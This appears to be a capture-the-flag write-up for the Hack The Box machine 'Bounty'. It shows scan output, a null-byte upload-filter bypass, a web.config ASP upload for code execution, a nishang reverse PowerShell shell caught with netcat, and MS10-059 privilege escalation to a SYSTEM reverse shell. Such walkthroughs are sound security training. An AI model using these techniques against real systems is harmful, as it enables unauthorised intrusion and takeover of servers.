The box only had port 80 running which had an application that allows to upload files while preventing asp, aspx and few other file extensions.
I was bale to bypass the upload filter using a null byte %00.jpg but the application generated an error giving a clue about something related to web.config.
After some research about web.config, I was able to find an article describing how to upload a web.config file with ASP code embedded and I was able to get a shell.
For privilege escalation, I was able to get system using MS10-059
# Nmap 7.80 scan initiated Sun Mar 8 22:08:29 2020 as: nmap -Pn -sC -sV -p 80 -oN nmap/Bounty_nmap.txt 10.10.10.93
Nmap scan report for 10.10.10.93
Host is up (0.040s latency).
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 7.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: Bounty
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Mar 8 22:08:50 2020 -- 1 IP address (1 host up) scanned in 21.20 seconds
# Nmap 7.80 scan initiated Sun Mar 8 22:08:50 2020 as: nmap -Pn -sU -oN nmap/Bounty.udp 10.10.10.93
Nmap scan report for 10.10.10.93
Host is up.
All 1000 scanned ports on 10.10.10.93 are open|filtered
# Nmap done at Sun Mar 8 22:12:12 2020 -- 1 IP address (1 host up) scanned in 201.34 seconds
Enumerating HTTP
Port 80 just shows a picture. I saved the picture as merling.jpg and used strings, steghide and exiftool but didn't find anything.
Nikto
Nothing much was found with Nikto
nikto -host http://10.10.10.93
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 10.10.10.93
+ Target Hostname: 10.10.10.93
+ Target Port: 80
+ Start Time: 2020-03-08 22:18:44 (GMT-4)
---------------------------------------------------------------------------
+ Server: Microsoft-IIS/7.5
+ Retrieved x-powered-by header: ASP.NET
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Retrieved x-aspnet-version header: 2.0.50727
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Allowed HTTP Methods: OPTIONS, TRACE, GET, HEAD, POST
+ Public HTTP Methods: OPTIONS, TRACE, GET, HEAD, POST
+ 7863 requests: 0 error(s) and 7 item(s) reported on remote host
+ End Time: 2020-03-08 22:24:28 (GMT-4) (344 seconds)
---------------------------------------------------------------------------
I tried uploading a file with ASP, ASPX and it failed. But when I uploaded the merling.jpg file it worked. Based on that, I used Burp proxy to intercept the request and used a null byte %00 to attempt to bypass the upload filter.
Bypassing the upload filter using null byte %00
When I tried to execute the shellie.aspx file http://10.10.10.93/UploadedFiles/shellie.aspx I got the following error below.
I have no idea what to do from here, so I googled "IIS 7.5 web.config exploit" and to my surprise, I found the following link stating that we can actually upload a *.config file with asp code and it would work.
Explanation of web.config as quoted from the link above:
Web.config
What is a web.config file?
A web.config file lets you customize the way your site or a specific directory on your site behaves. For example, if you place a web.config file in your root directory, it will affect your entire site. If you place it in a /content directory, it will only affect that directory.
Executed it via http://10.10.10.93/UploadedFiles/web.config
Started the listener on port 8008 ( I edited on the nishang reverse tcp script)
Got a shell as merlin
Started python http server
# To server the nishang revser powershell script
python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.93 - - [09/Mar/2020 00:21:47] "GET /pwsh.ps1 HTTP/1.1" 200 -
# Listenner to capture the shell
# rlwrap nc -lnvp 8008
listening on [any] 8008 ...
connect to [10.10.14.3] from (UNKNOWN) [10.10.10.93] 49158
Windows PowerShell running as user BOUNTY$ on BOUNTY
Copyright (C) 2015 Microsoft Corporation. All rights reserved.
PS C:\windows\system32\inetsrv>whoami
bounty\merlin
PS C:\users\merlin\desktop> systeminfo
Host Name: BOUNTY
OS Name: Microsoft Windows Server 2008 R2 Datacenter
OS Version: 6.1.7600 N/A Build 7600
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Server
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization:
Product ID: 55041-402-3606965-84760
Original Install Date: 5/30/2018, 12:22:24 AM
System Boot Time: 3/9/2020, 5:22:56 AM
System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform
System Type: x64-based PC
Processor(s): 1 Processor(s) Installed.
[01]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
BIOS Version: Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume1
System Locale: en-us;English (United States)
Input Locale: en-us;English (United States)
Time Zone: (UTC+02:00) Athens, Bucharest, Istanbul
Total Physical Memory: 2,047 MB
Available Physical Memory: 1,586 MB
Virtual Memory: Max Size: 4,095 MB
Virtual Memory: Available: 3,594 MB
Virtual Memory: In Use: 501 MB
Page File Location(s): C:\pagefile.sys
Domain: WORKGROUP
Logon Server: N/A
Hotfix(s): N/A
Network Card(s): 1 NIC(s) Installed.
[01]: Intel(R) PRO/1000 MT Network Connection
Connection Name: Local Area Connection
DHCP Enabled: No
IP address(es)
[01]: 10.10.10.93
Privilege Escalation
I used the windows exploit suggester
./windows-exploit-suggester.py -d 2020-03-06-mssb.xls -i sysinfo_bounty
[*] initiating winsploit version 3.3...
[*] database file detected as xls or xlsx based on extension
[*] attempting to read from the systeminfo input file
[+] systeminfo input file read successfully (ascii)
[*] querying database file for potential vulnerabilities
[*] comparing the 0 hotfix(es) against the 197 potential bulletins(s) with a database of 137 known exploits
[*] there are now 197 remaining vulns
[+] [E] exploitdb PoC, [M] Metasploit module, [*] missing bulletin
[+] windows version identified as 'Windows 2008 R2 64-bit'
[*]
[M] MS13-009: Cumulative Security Update for Internet Explorer (2792100) - Critical
[M] MS13-005: Vulnerability in Windows Kernel-Mode Driver Could Allow Elevation of Privilege (2778930) - Important
[E] MS12-037: Cumulative Security Update for Internet Explorer (2699988) - Critical
[*] http://www.exploit-db.com/exploits/35273/ -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5., PoC
[*] http://www.exploit-db.com/exploits/34815/ -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5.0 Bypass (MS12-037), PoC
[*]
[E] MS11-011: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (2393802) - Important
[M] MS10-073: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (981957) - Important
[M] MS10-061: Vulnerability in Print Spooler Service Could Allow Remote Code Execution (2347290) - Critical
[E] MS10-059: Vulnerabilities in the Tracing Feature for Services Could Allow Elevation of Privilege (982799) - Important
[E] MS10-047: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (981852) - Important
[M] MS10-002: Cumulative Security Update for Internet Explorer (978207) - Critical
[M] MS09-072: Cumulative Security Update for Internet Explorer (976325) - Critical
I used MS10-059. A google search on MS10-059 github takes you to the following link with an exe executable
PS C:\users\merlin\documents> .\MS10-059.exe
/Chimichurri/-->This exploit gives you a Local System shell <BR>/Chimichurri/-->
Usage: Chimichurri.exe ipaddress port <BR>
Started a Listener
rlwrap nc -lnvp 9002
listening on [any] 9002 ...
Got Reverse Shell as SYSTEM
# On the target box
PS C:\users\merlin\documents> .\MS10-059.exe 10.10.14.3 9002
# On my Kali box
rlwrap nc -lnvp 9002
listening on [any] 9002 ...
connect to [10.10.14.3] from (UNKNOWN) [10.10.10.93] 49181
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\users\merlin\documents>whoami
whoami
nt authority\system
C:\users\merlin\documents>